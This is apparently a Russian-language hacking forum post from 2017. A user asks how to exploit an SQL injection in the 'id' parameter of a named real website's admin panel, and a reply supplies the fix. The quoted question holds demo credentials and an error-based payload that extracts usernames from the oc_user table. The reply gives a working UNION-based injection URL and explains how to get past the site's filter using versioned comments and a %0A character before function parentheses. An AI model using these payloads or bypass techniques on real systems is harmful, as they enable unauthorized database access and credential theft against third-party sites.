31.05.2017, 20:51
|
|
Постоянный
Регистрация: 17.03.2014
Сообщений: 530
С нами:
6398966
Репутация:
154
|
|
Сообщение от kacergei
↑
Добрый подскажите, как раскрутить данную sql (параметр id)
Spoiler: посмотреть
Авторизация:
Код:
bringthemes.com/natural-food/home-1/admin/ (demo/demo)
Пробую:
Код:
bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&token=Hc0bs042rmLz50tctvPv2grNiWgYZqaF&id='+AND+EXTRACTVALUE(5632,CONCAT(0x3a,((select(substring(group_concat(username),1,32))from(oc_user)))))--+uHHl
но в ответ постоянная загрузка и отрубает (Error - Connection reset)
Подскажите что фильтрует и как обойти?
обратил внимание что не нравится ему select и group_concat, но могу ошибаться в разных вариациях не выходит никак((
Зачем идти в Москву через Китай
Код:
http://bringthemes.com/natural-food/home-1/admin/index.php?route=extension/module/bringblog/comment&id=-1 union /*!12345select*/ 1,2,3,4,user(),version%0A(),7 --+uHHl&token=nGLvYhzmGxV0JoQDKfwjr1xiBwes8qoF
Бапассить select можно старыми добрыми комментами
А байпассить функции с помощью %0A перед ()
UPD: И ты используешь error-based хотя здесь самый обычный UNION
|
|
|